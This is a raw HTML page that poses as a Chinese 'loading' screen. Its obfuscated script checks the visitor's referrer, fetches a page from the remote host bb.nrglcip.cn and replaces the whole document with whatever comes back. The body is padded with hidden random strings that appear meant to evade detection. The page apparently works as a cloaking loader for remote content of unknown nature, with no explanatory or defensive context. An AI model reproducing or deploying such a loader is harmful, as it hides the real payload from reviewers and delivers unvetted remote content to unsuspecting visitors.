<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Mvf49f {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Mvf49f .iu6JWUiyI {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Mvf49f .content {
            line-height: 50px;
            text-align: center
        }

        .Mvf49f .img {
            width: 100%
        }

        .Mvf49f .pVLhQaNBX {
            text-align: center
        }

        .Mvf49f .pVLhQaNBX span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Mvf49f .pVLhQaNBX span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Mvf49f .pVLhQaNBX span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Mvf49f .pVLhQaNBX span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Mvf49f .pVLhQaNBX span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Mvf49f .pVLhQaNBX span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Mvf49f .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function rx5aly8rgd9kz(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var dLWt0 = rx5aly8rgd9kz('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ dLWt0 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ dLWt0 +".html?a=share";
		}
		
        jGHLDNdo=url+"#"+new Date().getTime();
        jGHLDNdo && function() {
            $.get(jGHLDNdo, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>SV355PPD3Term8PbhfBPpMnEKqN4FU2P2IH5fAe2PNl</div>
<span style='display:none'>oekYZ6CYQPfNoMORzM</span>
<img  src='' style='display:none'><div class="Mvf49f">
    <div class="iu6JWUiyI">
        <div class="pVLhQaNBX">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >nVXGkputuEHbj7f2</b>
<span style='display:none'>wambFA7mvvsMaSuHDtxa40zR</span>
<h1 style='display:none' >VDpJmMINjtmxkKw0uWBwQkBzhFLoiZDSAexbCJ7MR7XyN0GnZh9XS0UkLMSa5v</h1>
<b style='display:none' >nVXGkputuEHbj7f2</b>
<b style='display:none' >nVXGkputuEHbj7f2</b>
<b style='display:none' >nVXGkputuEHbj7f2</b>
<a  href='#' style='display:none'>UdjxDmoABieFIWH</a>
<img  src='' style='display:none'>
<b style='display:none' >nVXGkputuEHbj7f2</b></body>
</html>